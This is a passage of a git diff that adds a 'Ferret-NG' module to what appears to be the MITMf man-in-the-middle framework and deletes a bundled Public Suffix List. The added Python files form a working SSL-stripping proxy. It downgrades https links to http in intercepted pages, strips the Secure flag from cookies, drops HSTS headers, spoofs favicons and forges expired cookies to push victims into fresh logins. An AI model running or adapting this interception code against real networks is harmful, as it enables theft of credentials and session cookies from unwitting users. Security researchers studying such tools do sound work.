self.getDomainFor(host) + self.cleanedCookies.add((client, domain)) + + expireHeaders = [] + + for cookie in headers['cookie'].split(";"): + cookie = cookie.split("=")[0].strip() + expireHeadersForCookie = self.getExpireCookieStringFor(cookie, host, domain, path) + expireHeaders.extend(expireHeadersForCookie) + + return expireHeaders + + def hasCookies(self, headers): + return 'cookie' in headers + + def getDomainFor(self, host): + hostParts = host.split(".") + return "." + hostParts[-2] + "." + hostParts[-1] + + def getExpireCookieStringFor(self, cookie, host, domain, path): + pathList = path.split("/") + expireStrings = list() + + expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + domain + + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") + + expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + host + + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") + + if len(pathList) > 2: + expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" + + domain + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") + + expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" + + host + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n") + + return expireStrings + + diff --git a/core/ferretNG/DnsCache.py b/core/ferretNG/DnsCache.py new file mode 100644 index 0000000..f0cc638 --- /dev/null +++ b/core/ferretNG/DnsCache.py @@ -0,0 +1,49 @@ +# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +import logging + +mitmf_logger = logging.getLogger('mitmf') + +class DnsCache: + + ''' + The DnsCache maintains a cache of DNS lookups, mirroring the browser experience. + ''' + + _instance = None + + def __init__(self): + self.customAddress = None + self.cache = {} + + @staticmethod + def getInstance(): + if DnsCache._instance == None: + DnsCache._instance = DnsCache() + + return DnsCache._instance + + def cacheResolution(self, host, address): + self.cache[host] = address + + def getCachedAddress(self, host): + if host in self.cache: + return self.cache[host] + + return None diff --git a/core/ferretNG/FerretProxy.py b/core/ferretNG/FerretProxy.py new file mode 100644 index 0000000..d95f786 --- /dev/null +++ b/core/ferretNG/FerretProxy.py @@ -0,0 +1,24 @@ +# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +from twisted.web.http import HTTPChannel +from ClientRequest import ClientRequest + +class FerretProxy(HTTPChannel): + + requestFactory = ClientRequest diff --git a/core/ferretNG/SSLServerConnection.py b/core/ferretNG/SSLServerConnection.py new file mode 100644 index 0000000..8ba8007 --- /dev/null +++ b/core/ferretNG/SSLServerConnection.py @@ -0,0 +1,110 @@ +# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +import logging, re, string + +from ServerConnection import ServerConnection +from URLMonitor import URLMonitor + +mitmf_logger = logging.getLogger('mitmf') + +class SSLServerConnection(ServerConnection): + + ''' + For SSL connections to a server, we need to do some additional stripping. First we need + to make note of any relative links, as the server will be expecting those to be requested + via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies. + ''' + + cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE) + cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE) + iconExpression = re.compile(r"", re.IGNORECASE) + linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE) + headExpression = re.compile(r"", re.IGNORECASE) + + def __init__(self, command, uri, postData, headers, client): + ServerConnection.__init__(self, command, uri, postData, headers, client) + self.urlMonitor = URLMonitor.getInstance() + + def getLogLevel(self): + return logging.INFO + + def getPostPrefix(self): + return "SECURE POST" + + def handleHeader(self, key, value): + if (key.lower() == 'set-cookie'): + value = SSLServerConnection.cookieExpression.sub("\g<1>", value) + + ServerConnection.handleHeader(self, key, value) + + def stripFileFromPath(self, path): + (strippedPath, lastSlash, file) = path.rpartition('/') + return strippedPath + + def buildAbsoluteLink(self, link): + absoluteLink = "" + + if ((not link.startswith('http')) and (not link.startswith('/'))): + absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link + + mitmf_logger.debug("[Ferret-NG] [SSLServerConnection] Found path-relative link in secure transmission: " + link) + mitmf_logger.debug("[Ferret-NG] [SSLServerConnection] New Absolute path-relative link: " + absoluteLink) + elif not link.startswith('http'): + absoluteLink = "http://"+self.headers['host']+link + + mitmf_logger.debug("[Ferret-NG] [SSLServerConnection] Found relative link in secure transmission: " + link) + mitmf_logger.debug("[Ferret-NG] [SSLServerConnection] New Absolute link: " + absoluteLink) + + if not absoluteLink == "": + absoluteLink = absoluteLink.replace('&', '&') + self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink); + + def replaceCssLinks(self, data): + iterator = re.finditer(SSLServerConnection.cssExpression, data) + + for match in iterator: + self.buildAbsoluteLink(match.group(1)) + + return data + + def replaceFavicon(self, data): + match = re.search(SSLServerConnection.iconExpression, data) + + if (match != None): + data = re.sub(SSLServerConnection.iconExpression, + "", data) + else: + data = re.sub(SSLServerConnection.headExpression, + "", data) + + return data + + def replaceSecureLinks(self, data): + data = ServerConnection.replaceSecureLinks(self, data) + data = self.replaceCssLinks(data) + + if (self.urlMonitor.isFaviconSpoofing()): + data = self.replaceFavicon(data) + + iterator = re.finditer(SSLServerConnection.linkExpression, data) + + for match in iterator: + self.buildAbsoluteLink(match.group(10)) + + return data diff --git a/core/ferretNG/ServerConnection.py b/core/ferretNG/ServerConnection.py new file mode 100644 index 0000000..e1e04ef --- /dev/null +++ b/core/ferretNG/ServerConnection.py @@ -0,0 +1,193 @@ +# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +import logging +import re +import string +import random +import zlib +import gzip +import StringIO +import sys + +from twisted.web.http import HTTPClient +from URLMonitor import URLMonitor + +mitmf_logger = logging.getLogger('mitmf') + +class ServerConnection(HTTPClient): + + ''' The server connection is where we do the bulk of the stripping. Everything that + comes back is examined. The headers we dont like are removed, and the links are stripped + from HTTPS to HTTP. + ''' + + urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE) + urlType = re.compile(r"https://", re.IGNORECASE) + urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE) + urlTypewww = re.compile(r"https://www", re.IGNORECASE) + urlwExplicitPort = re.compile(r'https://www([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE) + urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE) + urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE) + #urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE) + + def __init__(self, command, uri, postData, headers, client): + + self.command = command + self.uri = uri + self.postData = postData + self.headers = headers + self.client = client + self.clientInfo = None + self.urlMonitor = URLMonitor.getInstance() + self.isImageRequest = False + self.isCompressed = False + self.contentLength = None + self.shutdownComplete = False + + def getPostPrefix(self): + return "POST" + + def sendRequest(self): + if self.command == 'GET': + + mitmf_logger.debug(self.client.getClientIP() + " [Ferret-NG] Sending Request: {}".format(self.headers['host'])) + + self.sendCommand(self.command, self.uri) + + def sendHeaders(self): + for header, value in self.headers.iteritems(): + mitmf_logger.debug("[Ferret-NG] [ServerConnection] Sending header: ({}: {})".format(header, value)) + self.sendHeader(header, value) + + self.endHeaders() + + def sendPostData(self): + + self.transport.write(self.postData) + + def connectionMade(self): + mitmf_logger.debug("[Ferret-NG] [ServerConnection] HTTP connection made.") + self.sendRequest() + self.sendHeaders() + + if (self.command == 'POST'): + self.sendPostData() + + def handleStatus(self, version, code, message): + mitmf_logger.debug("[Ferret-NG] [ServerConnection] Server response: {} {} {}".format(version, code, message)) + self.client.setResponseCode(int(code), message) + + def handleHeader(self, key, value): + if (key.lower() == 'location'): + value = self.replaceSecureLinks(value) + + if (key.lower() == 'content-type'): + if (value.find('image') != -1): + self.isImageRequest = True + mitmf_logger.debug("[Ferret-NG] [ServerConnection] Response is image content, not scanning") + + if (key.lower() == 'content-encoding'): + if (value.find('gzip') != -1): + mitmf_logger.debug("[Ferret-NG] [ServerConnection] Response is compressed") + self.isCompressed = True + + elif (key.lower()== 'strict-transport-security'): + mitmf_logger.debug("[Ferret-NG] [ServerConnection] Zapped a strict-trasport-security header") + + elif (key.lower() == 'content-length'): + self.contentLength = value + + elif (key.lower() == 'set-cookie'): + self.client.responseHeaders.addRawHeader(key, value) + + else: + self.client.setHeader(key, value) + + def handleEndHeaders(self): + if (self.isImageRequest and self.contentLength != None): + self.client.setHeader("Content-Length", self.contentLength) + + if self.length == 0: + self.shutdown() + + if logging.getLevelName(mitmf_logger.getEffectiveLevel()) == "DEBUG": + for header, value in self.client.headers.iteritems(): + mitmf_logger.debug("[Ferret-NG] [ServerConnection] Receiving header: ({}: {})".format(header, value)) + + def handleResponsePart(self, data): + if (self.isImageRequest): + self.client.write(data) + else: + HTTPClient.handleResponsePart(self, data) + + def handleResponseEnd(self): + if (self.isImageRequest): + self.shutdown() + else: + try: + HTTPClient.handleResponseEnd(self) #Gets rid of some generic errors + except: + pass + + def handleResponse(self, data): + if (self.isCompressed): + mitmf_logger.debug("[Ferret-NG] [ServerConnection] Decompressing content...") + data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read() + + data = self.replaceSecureLinks(data) + + mitmf_logger.debug("[Ferret-NG] [ServerConnection] Read from server {} bytes of data".format(len(data))) + + if (self.contentLength != None): + self.client.setHeader('Content-Length', len(data)) + + try: + self.client.write(data) + except: + pass + + try: + self.shutdown() + except: + mitmf_logger.info("[Ferret-NG] [ServerConnection] Client connection dropped before request finished.") + + def replaceSecureLinks(self, data): + + iterator = re.finditer(ServerConnection.urlExpression, data) + + for match in iterator: + url = match.group() + + mitmf_logger.debug("[Ferret-NG] [ServerConnection] Found secure reference: " + url) + + url = url.replace('https://', 'http://', 1) + url = url.replace('&', '&') + self.urlMonitor.addSecureLink(self.client.getClientIP(), url) + + data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data) + return re.sub(ServerConnection.urlType, 'http://', data) + + def shutdown(self): + if not self.shutdownComplete: + self.shutdownComplete = True + try: + self.client.finish() + self.transport.loseConnection() + except: + pass diff --git a/core/ferretNG/ServerConnectionFactory.py b/core/ferretNG/ServerConnectionFactory.py new file mode 100644 index 0000000..a64c800 --- /dev/null +++ b/core/ferretNG/ServerConnectionFactory.py @@ -0,0 +1,48 @@ +# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +import logging +from twisted.internet.protocol import ClientFactory + +mitmf_logger = logging.getLogger('mimtf') + +class ServerConnectionFactory(ClientFactory): + + def __init__(self, command, uri, postData, headers, client): + self.command = command + self.uri = uri + self.postData = postData + self.headers = headers + self.client = client + + def buildProtocol(self, addr): + return self.protocol(self.command, self.uri, self.postData, self.headers, self.client) + + def clientConnectionFailed(self, connector, reason): + mitmf_logger.debug("[ServerConnectionFactory] Server connection failed.") + + destination = connector.getDestination() + + if (destination.port != 443): + mitmf_logger.debug("[ServerConnectionFactory] Retrying via SSL") + self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443) + else: + try: + self.client.finish() + except: + pass diff --git a/core/ferretNG/URLMonitor.py b/core/ferretNG/URLMonitor.py new file mode 100644 index 0000000..d1381aa --- /dev/null +++ b/core/ferretNG/URLMonitor.py @@ -0,0 +1,85 @@ +# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +import re +import os +import logging + +mitmf_logger = logging.getLogger('mimtf') + +class URLMonitor: + + ''' + The URL monitor maintains a set of (client, url) tuples that correspond to requests which the + server is expecting over SSL. It also keeps track of secure favicon urls. + ''' + + # Start the arms race, and end up here... + javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")] + cookies = dict() + _instance = None + + def __init__(self): + self.strippedURLs = set() + self.strippedURLPorts = dict() + + @staticmethod + def getInstance(): + if URLMonitor._instance == None: + URLMonitor._instance = URLMonitor() + + return URLMonitor._instance + + def isSecureLink(self, client, url): + for expression in URLMonitor.javascriptTrickery: + if (re.match(expression, url)): + return True + + return (client,url) in self.strippedURLs + + def getSecurePort(self, client, url): + if (client,url) in self.strippedURLs: + return self.strippedURLPorts[(client,url)] + else: + return 443 + + def addSecureLink(self, client, url): + methodIndex = url.find("//") + 2 + method = url[0:methodIndex] + + pathIndex = url.find("/", methodIndex) + if pathIndex is -1: + pathIndex = len(url) + url += "/" + + host = url[methodIndex:pathIndex].lower() + path = url[pathIndex:] + + port = 443 + portIndex = host.find(":") + + if (portIndex != -1): + host = host[0:portIndex] + port = host[portIndex+1:] + if len(port) == 0: + port = 443 + + url = method + host + path + + self.strippedURLs.add((client, url)) + self.strippedURLPorts[(client, url)] = int(port) diff --git a/core/publicsuffix/__init__.py b/core/ferretNG/__init__.py similarity index 100% rename from core/publicsuffix/__init__.py rename to core/ferretNG/__init__.py diff --git a/core/publicsuffix/publicsuffix.py b/core/publicsuffix/publicsuffix.py deleted file mode 100644 index 5488ab2..0000000 --- a/core/publicsuffix/publicsuffix.py +++ /dev/null @@ -1,106 +0,0 @@ -"""Public Suffix List module for Python. -""" - -import codecs -import os.path - -class PublicSuffixList(object): - def __init__(self, input_file=None): - """Reads and parses public suffix list. - - input_file is a file object or another iterable that returns - lines of a public suffix list file. If input_file is None, an - UTF-8 encoded file named "publicsuffix.txt" in the same - directory as this Python module is used. - - The file format is described at http://publicsuffix.org/list/ - """ - - if input_file is None: - input_path = os.path.join(os.path.dirname(__file__), 'publicsuffix.txt') - input_file = codecs.open(input_path, "r", "utf8") - - root = self._build_structure(input_file) - self.root = self._simplify(root) - - def _find_node(self, parent, parts): - if not parts: - return parent - - if len(parent) == 1: - parent.append({}) - - assert len(parent) == 2 - negate, children = parent - - child = parts.pop() - - child_node = children.get(child, None) - - if not child_node: - children[child] = child_node = [0] - - return self._find_node(child_node, parts) - - def _add_rule(self, root, rule): - if rule.startswith('!'): - negate = 1 - rule = rule[1:] - else: - negate = 0 - - parts = rule.split('.') - self._find_node(root, parts)[0] = negate - - def _simplify(self, node): - if len(node) == 1: - return node[0] - - return (node[0], dict((k, self._simplify(v)) for (k, v) in node[1].items())) - - def _build_structure(self, fp): - root = [0] - - for line in fp: - line = line.strip() - if line.startswith('//') or not line: - continue - - self._add_rule(root, line.split()[0].lstrip('.')) - - return root - - def _lookup_node(self, matches, depth, parent, parts): - if parent in (0, 1): - negate = parent - children = None - else: - negate, children = parent - - matches[-depth] = negate - - if depth < len(parts) and children: - for name in ('*', parts[-depth]): - child = children.get(name, None) - if child is not None: - self._lookup_node(matches, depth+1, child, parts) - - def get_public_suffix(self, domain): - """get_public_suffix("www.example.com") -> "example.com" - - Calling this function with a DNS name will return the - public suffix for that name. - - Note that for internationalized domains the list at - http://publicsuffix.org uses decoded names, so it is - up to the caller to decode any Punycode-encoded names. - """ - - parts = domain.lower().lstrip('.').split('.') - hits = [None] * len(parts) - - self._lookup_node(hits, 1, self.root, parts) - - for i, what in enumerate(hits): - if what is not None and what == 0: - return '.'.join(parts[i:]) diff --git a/core/publicsuffix/publicsuffix.txt b/core/publicsuffix/publicsuffix.txt deleted file mode 100644 index 87b2f33..0000000 --- a/core/publicsuffix/publicsuffix.txt +++ /dev/null @@ -1,4909 +0,0 @@ -// ***** BEGIN LICENSE BLOCK ***** -// Version: MPL 1.1/GPL 2.0/LGPL 2.1 -// -// The contents of this file are subject to the Mozilla Public License Version -// 1.1 (the "License"); you may not use this file except in compliance with -// the License. You may obtain a copy of the License at -// http://www.mozilla.org/MPL/ -// -// Software distributed under the License is distributed on an "AS IS" basis, -// WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License -// for the specific language governing rights and limitations under the -// License. -// -// The Original Code is the Public Suffix List. -// -// The Initial Developer of the Original Code is -// Jo Hermans . -// Portions created by the Initial Developer are Copyright (C) 2007 -// the Initial Developer. All Rights Reserved. -// -// Contributor(s): -// Ruben Arakelyan -// Gervase Markham -// Pamela Greene -// David Triendl -// Jothan Frakes -// The kind representatives of many TLD registries -// -// Alternatively, the contents of this file may be used under the terms of -// either the GNU General Public License Version 2 or later (the "GPL"), or -// the GNU Lesser General Public License Version 2.1 or later (the "LGPL"), -// in which case the provisions of the GPL or the LGPL are applicable instead -// of those above. If you wish to allow use of your version of this file only -// under the terms of either the GPL or the LGPL, and not to allow others to -// use your version of this file under the terms of the MPL, indicate your -// decision by deleting the provisions above and replace them with the notice -// and other provisions required by the GPL or the LGPL. If you do not delete -// the provisions above, a recipient may use your version of this file under -// the terms of any one of the MPL, the GPL or the LGPL. -// -// ***** END LICENSE BLOCK ***** - -// ac : http://en.wikipedia.org/wiki/.ac -ac -com.ac -edu.ac -gov.ac -net.ac -mil.ac -org.ac - -// ad : http://en.wikipedia.org/wiki/.ad -ad -nom.ad - -// ae : http://en.wikipedia.org/wiki/.ae -// see also: "Domain Name Eligibility Policy" at http://www.aeda.ae/eng/aepolicy.php -ae -co.ae -net.ae -org.ae -sch.ae -ac.ae -gov.ae -mil.ae - -// aero : see http://www.information.aero/index.php?id=66 -aero -accident-investigation.aero -accident-prevention.aero -aerobatic.aero -aeroclub.aero -aerodrome.aero -agents.aero -aircraft.aero -airline.aero -airport.aero -air-surveillance.aero -airtraffic.aero -air-traffic-control.aero -ambulance.aero -amusement.aero -association.aero -author.aero -ballooning.aero -broker.aero -caa.aero -cargo.aero -catering.aero -certification.aero -championship.aero -charter.aero -civilaviation.aero -club.aero -conference.aero -consultant.aero -consulting.aero -control.aero -council.aero -crew.aero -design.aero -dgca.aero -educator.aero -emergency.aero -engine.aero -engineer.aero -entertainment.aero -equipment.aero -exchange.aero -express.aero -federation.aero -flight.aero -freight.aero -fuel.aero -gliding.aero -government.aero -groundhandling.aero -group.aero -hanggliding.aero -homebuilt.aero -insurance.aero -journal.aero -journalist.aero -leasing.aero -logistics.aero -magazine.aero -maintenance.aero -marketplace.aero -media.aero -microlight.aero -modelling.aero -navigation.aero -parachuting.aero -paragliding.aero -passenger-association.aero -pilot.aero -press.aero -production.aero -recreation.aero -repbody.aero -res.aero -research.aero -rotorcraft.aero -safety.aero -scientist.aero -services.aero -show.aero -skydiving.aero -software.aero -student.aero -taxi.aero -trader.aero -trading.aero -trainer.aero -union.aero -workinggroup.aero -works.aero - -// af : http://www.nic.af/help.jsp -af -gov.af -com.af -org.af -net.af -edu.af - -// ag : http://www.nic.ag/prices.htm -ag -com.ag -org.ag -net.ag -co.ag -nom.ag - -// ai : http://nic.com.ai/ -ai -off.ai -com.ai -net.ai -org.ai - -// al : http://www.ert.gov.al/ert_alb/faq_det.html?Id=31 -al -com.al -edu.al -gov.al -mil.al -net.al -org.al - -// am : http://en.wikipedia.org/wiki/.am -am - -// an : http://www.una.an/an_domreg/default.asp -an -com.an -net.an -org.an -edu.an - -// ao : http://en.wikipedia.org/wiki/.ao -// http://www.dns.ao/REGISTR.DOC -ao -ed.ao -gv.ao -og.ao -co.ao -pb.ao -it.ao - -// aq : http://en.wikipedia.org/wiki/.aq -aq - -// ar : http://en.wikipedia.org/wiki/.ar -*.ar -!congresodelalengua3.ar -!educ.ar -!gobiernoelectronico.ar -!mecon.ar -!nacion.ar -!nic.ar -!promocion.ar -!retina.ar -!uba.ar - -// arpa : http://en.wikipedia.org/wiki/.arpa -// Confirmed by registry 2008-06-18 -e164.arpa -in-addr.arpa -ip6.arpa -iris.arpa -uri.arpa -urn.arpa - -// as : http://en.wikipedia.org/wiki/.as -as -gov.as - -// asia: http://en.wikipedia.org/wiki/.asia -asia - -// at : http://en.wikipedia.org/wiki/.at -// Confirmed by registry 2008-06-17 -at -ac.at -co.at -gv.at -or.at - -// http://www.info.at/ -biz.at -info.at - -// priv.at : http://www.nic.priv.at/ -// Submitted by registry 2008-06-09 -priv.at - -// au : http://en.wikipedia.org/wiki/.au -*.au -// au geographical names (vic.au etc... are covered above) -act.edu.au -nsw.edu.au -nt.edu.au -qld.edu.au -sa.edu.au -tas.edu.au -vic.edu.au -wa.edu.au -act.gov.au -// Removed at request of Shae.Donelan@services.nsw.gov.au, 2010-03-04 -// nsw.gov.au -nt.gov.au -qld.gov.au -sa.gov.au -tas.gov.au -vic.gov.au -wa.gov.au -// CGDNs - http://www.aucd.org.au/ -act.au -nsw.au -nt.au -qld.au -sa.au -tas.au -vic.au -wa.au - -// aw : http://en.wikipedia.org/wiki/.aw -aw -com.aw - -// ax : http://en.wikipedia.org/wiki/.ax -ax - -// az : http://en.wikipedia.org/wiki/.az -az -com.az -net.az -int.az -gov.az -org.az -edu.az -info.az -pp.az -mil.az -name.az -pro.az -biz.az - -// ba : http://en.wikipedia.org/wiki/.ba -ba -org.ba -net.ba -edu.ba -gov.ba -mil.ba -unsa.ba -unbi.ba -co.ba -com.ba -rs.ba - -// bb : http://en.wikipedia.org/wiki/.bb -bb -biz.bb -com.bb -edu.bb -gov.bb -info.bb -net.bb -org.bb -store.bb - -// bd : http://en.wikipedia.org/wiki/.bd -*.bd - -// be : http://en.wikipedia.org/wiki/.be -// Confirmed by registry 2008-06-08 -be -ac.be - -// bf : http://en.wikipedia.org/wiki/.bf -bf -gov.bf - -// bg : http://en.wikipedia.org/wiki/.bg -// https://www.register.bg/user/static/rules/en/index.html -bg -a.bg -b.bg -c.bg -d.bg -e.bg -f.bg -g.bg -h.bg -i.bg -j.bg -k.bg -l.bg -m.bg -n.bg -o.bg -p.bg -q.bg -r.bg -s.bg -t.bg -u.bg -v.bg -w.bg -x.bg -y.bg -z.bg -0.bg -1.bg -2.bg -3.bg -4.bg -5.bg -6.bg -7.bg -8.bg -9.bg - -// bh : http://en.wikipedia.org/wiki/.bh -bh -com.bh -edu.bh -net.bh -org.bh -gov.bh - -// bi : http://en.wikipedia.org/wiki/.bi -// http://whois.nic.bi/ -bi -co.bi -com.bi -edu.bi -or.bi -org.bi - -// biz : http://en.wikipedia.org/wiki/.biz -biz - -// bj : http://en.wikipedia.org/wiki/.bj -bj -asso.bj -barreau.bj -gouv.bj - -// bm : http://www.bermudanic.bm/dnr-text.txt -bm -com.bm -edu.bm -gov.bm -net.bm -org.bm - -// bn : http://en.wikipedia.org/wiki/.bn -*.bn - -// bo : http://www.nic.bo/ -bo -com.bo -edu.bo -gov.bo -gob.bo -int.bo -org.bo -net.bo -mil.bo -tv.bo - -// br : http://registro.br/dominio/dpn.html -// Updated by registry 2011-03-01 -br -adm.br -adv.br -agr.br -am.br -arq.br -art.br -ato.br -b.br -bio.br -blog.br -bmd.br -can.br -cim.br -cng.br -cnt.br -com.br -coop.br -ecn.br -edu.br -emp.br -eng.br -esp.br -etc.br -eti.br -far.br -flog.br -fm.br -fnd.br -fot.br -fst.br -g12.br -ggf.br -gov.br -imb.br -ind.br -inf.br -jor.br -jus.br -lel.br -mat.br -med.br -mil.br -mus.br -net.br -nom.br -not.br -ntr.br -odo.br -org.br -ppg.br -pro.br -psc.br -psi.br -qsl.br -radio.br -rec.br -slg.br -srv.br -taxi.br -teo.br -tmp.br -trd.br -tur.br -tv.br -vet.br -vlog.br -wiki.br -zlg.br - -// bs : http://www.nic.bs/rules.html -bs -com.bs -net.bs -org.bs -edu.bs -gov.bs - -// bt : http://en.wikipedia.org/wiki/.bt -bt -com.bt -edu.bt -gov.bt -net.bt -org.bt - -// bv : No registrations at this time. -// Submitted by registry 2006-06-16 - -// bw : http://en.wikipedia.org/wiki/.bw -// http://www.gobin.info/domainname/bw.doc -// list of other 2nd level tlds ? -bw -co.bw -org.bw - -// by : http://en.wikipedia.org/wiki/.by -// http://tld.by/rules_2006_en.html -// list of other 2nd level tlds ? -by -gov.by -mil.by -// Official information does not indicate that com.by is a reserved -// second-level domain, but it's being used as one (see www.google.com.by and -// www.yahoo.com.by, for example), so we list it here for safety's sake. -com.by - -// http://hoster.by/ -of.by - -// bz : http://en.wikipedia.org/wiki/.bz -// http://www.belizenic.bz/ -bz -com.bz -net.bz -org.bz -edu.bz -gov.bz - -// ca : http://en.wikipedia.org/wiki/.ca -ca -// ca geographical names -ab.ca -bc.ca -mb.ca -nb.ca -nf.ca -nl.ca -ns.ca -nt.ca -nu.ca -on.ca -pe.ca -qc.ca -sk.ca -yk.ca -// gc.ca: http://en.wikipedia.org/wiki/.gc.ca -// see also: http://registry.gc.ca/en/SubdomainFAQ -gc.ca - -// cat : http://en.wikipedia.org/wiki/.cat -cat - -// cc : http://en.wikipedia.org/wiki/.cc -cc - -// cd : http://en.wikipedia.org/wiki/.cd -// see also: https://www.nic.cd/domain/insertDomain_2.jsp?act=1 -cd -gov.cd - -// cf : http://en.wikipedia.org/wiki/.cf -cf - -// cg : http://en.wikipedia.org/wiki/.cg -cg - -// ch : http://en.wikipedia.org/wiki/.ch -ch - -// ci : http://en.wikipedia.org/wiki/.ci -// http://www.nic.ci/index.php?page=charte -ci -org.ci -or.ci -com.ci -co.ci -edu.ci -ed.ci -ac.ci -net.ci -go.ci -asso.ci -aéroport.ci -int.ci -presse.ci -md.ci -gouv.ci - -// ck : http://en.wikipedia.org/wiki/.ck -*.ck - -// cl : http://en.wikipedia.org/wiki/.cl -cl -gov.cl -gob.cl - -// cm : http://en.wikipedia.org/wiki/.cm -cm -gov.cm - -// cn : http://en.wikipedia.org/wiki/.cn -// Submitted by registry 2008-06-11 -cn -ac.cn -com.cn -edu.cn -gov.cn -net.cn -org.cn -mil.cn -公司.cn -网络.cn -網絡.cn -// cn geographic names -ah.cn -bj.cn -cq.cn -fj.cn -gd.cn -gs.cn -gz.cn -gx.cn -ha.cn -hb.cn -he.cn -hi.cn -hl.cn -hn.cn -jl.cn -js.cn -jx.cn -ln.cn -nm.cn -nx.cn -qh.cn -sc.cn -sd.cn -sh.cn -sn.cn -sx.cn -tj.cn -xj.cn -xz.cn -yn.cn -zj.cn -hk.cn -mo.cn -tw.cn - -// co : http://en.wikipedia.org/wiki/.co -// Submitted by registry 2008-06-11 -co -arts.co -com.co -edu.co -firm.co -gov.co -info.co -int.co -mil.co -net.co -nom.co -org.co -rec.co -web.co - -// com : http://en.wikipedia.org/wiki/.com -com - -// CentralNic names : http://www.centralnic.com/names/domains -// Confirmed by registry 2008-06-09 -ar.com -br.com -cn.com -de.com -eu.com -gb.com -hu.com -jpn.com -kr.com -no.com -qc.com -ru.com -sa.com -se.com -uk.com -us.com -uy.com -za.com - -// Requested by Yngve Pettersen 2009-11-26 -operaunite.com - -// Requested by Eduardo Vela 2010-09-06 -appspot.com - -// coop : http://en.wikipedia.org/wiki/.coop -coop - -// cr : 